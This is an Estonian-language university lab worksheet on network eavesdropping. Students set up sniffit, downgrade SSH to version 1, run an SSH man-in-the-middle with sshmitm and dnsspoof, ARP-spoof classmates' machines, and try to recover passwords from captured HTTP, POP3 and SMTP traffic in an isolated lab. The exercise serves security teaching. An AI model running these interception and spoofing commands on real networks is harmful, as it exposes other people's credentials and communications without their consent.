Võrguliikluse pealtkuulamine

  1. Tehke sellele juhendile Reload!
  2. Ettevalmistuseks (rooduna; ssh võtme parool jätke tühjaks!):
    apt-get install telnetd sniffit tcpdump wireshark dsniff
    
    Kontrollige, kas teil on olemas fail /etc/ssh/ssh_host_key ning kui ei ole, laske uus SSHv1 võti genereerida:
    ssh-keygen -t rsa1 -f /etc/ssh/ssh_host_key
    
    Kontrollige, et failis /etc/ssh/sshd_config oleks read
    Protocol 2,1
    HostKey /etc/ssh/ssh_host_key
    
    ning kui ei ole, redigeerige seda faili ning muutke Protocol-rida sobivaks ja lisage HostKey rida ning kui muutsite, siis andke ka käsk
    /etc/init.d/ssh restart
    
    Sellega konfigureerite SSH serveri ka protokolli versiooni 1 toetama (sest meie pealtkuulamisprogramm oskab ainult SSH v1 kuulata).
  3. Tekitage (rooduna) useradd abil oma masinasse kasutaja "test" ja pange talle passwd test abil parooliks testXX (kus XX on teie arvuti number)
  4. Tehke kindlaks oma arvuti IP-aadress:
    ip addr ls
    
    Teie IP-aadress on väljundis inet real enne /24 maski, 192.168.10.*
  5. Tekitage (rooduna) kataloog 'sniffit', ja pange seal sees käima 'sniffit':
    mkdir sniffit
    cd sniffit
    sniffit -s meiemasinaIP
    
    (või siseneva suuna logimiseks:)
    sniffit -t meiemasinaIP
    
  6. Võtke teine terminal, telnettige naabermasinasse, testimaks telneti töötamist ja logige sisse kasutajana test:
    telnet 192.168.10.Y
    
    Andke mõned käsud, et need ära tunneksite, ja logige välja (exit).
  7. Edasi krüptige liiklust: logige naabermasinasse ssh abil:
    ssh test@192.168.10.Y
    
    Andke samuti mõned käsud ja logige välja.
  8. Pange sniffit kinni (Ctrl+C) ja uurige logifaile (less abil) - kas leiate enda sisestatud teksti? Uuritud logifailid võib rahulikult ära kustutada (rm ...).
  9. Kontrollige, et saate ssh -1 test@192.168.10.Y abil naaberavutisse sisse logida.
  10. Moodustage 3-arvutised grupid: A - ohver, B - õige server, E - man-in-the middle.
  11. E - paneb ssh serveri seisma (/etc/init.d/ssh stop) käivitab
    sshmitm -I B-IP-aadress
    
  12. B - jälgib finger abil sisselogitud kasutajaid (mis masinast!)
  13. A - tekitab faili hosts.dnsspoof sisuga (E on vastava masina IP viimane number ja praksXX on masina B nimi)
    192.168.10.E praksXX.test.mt.ut.ee
    
    käivitab dnsspoofi:
    /usr/sbin/dnsspoof -f hosts.dnsspoof udp port 53
    
    Seejärel proovib teises aknas logida ssh'ga masinasse B (tõenäoliselt kaevatakse hosti võtme muutumise üle, lugege veateadet ning kustutage vajadusel fail .ssh/knwn_hosts, et teatest vabaneda)
    ssh -1 test@praksXX.test.mt.ut.ee
    
  14. E - jälgib liiklust ja soovikorral sekkub.
  15. Vahetage rolle (ssh uuesti käima, dnspoof seisma jne).
  16. Lülitage sisse IP pakettide ruutimine ja välja rp_filter ning ICMP redirectide saatmine:
    echo "1" > /proc/sys/net/ipv4/ip_forward
    echo "0" > /proc/sys/net/ipv4/conf/eth0/rp_filter
    echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects
    
  17. Moodustage paarid: pealtkuulaja A ja ohver B - pealtkuulaja käivitab:
    arpspoof 192.168.10.B
    
    ja samaaegselt veel lisaks
    tcpdump -e host 192.168.10.B
    
    Tüüpiline ARP tabel (näeb käsuga 'arp -a')
    praks07.test.mt.ut.ee (192.168.10.107) at 00:AA:BB:CC:DD:07 [ether] on eth0
    praks08.test.mt.ut.ee (192.168.10.108) at 00:AA:BB:CC:DD:08 [ether] on eth0
    praks09.test.mt.ut.ee (192.168.10.109) at 00:AA:BB:CC:DD:09 [ether] on eth0
    
  18. Kaks ohvrit telnetivad omavahel (B1 <-> B2) - pealtkuulaja A1 peaks nägema nüüd oma ohvri B1 arvutisse suunduvaid pakette (kui ei näe, uuri selle ohvri paarilise arvuti arp tabelit), samuti näeb A2 ohvri B2 liiklust.
  19. Proovige sniffit abil liiklust salvestada ja seda uurida.
    sniffit -t 192.168.10.Y
    
  20. Vahetage pooli.
  21. Kuulake sniffit -s ... abil enda arvutist tehtavaid veebipäringuid.
  22. Praktikumi arvestuse saamiseks saatke aadressil mroos@ut.ee üks võrgust kuulatud HTTP päring koos kõigi päiseridadega (mitte vastus).
  23. (*) Salvestage sniffiti abil veel erinevat sorti liiklust: HTTP (parooli all olev leht), HTTPS, POP3, SMTP (autentimisega) ning püüdke kindlaks teha parooli.
  24. Kustutage rooduna sniffit kataloog ja tekitatud failid:
    rm -rf /root/sniffit /root/hosts.dnsspoof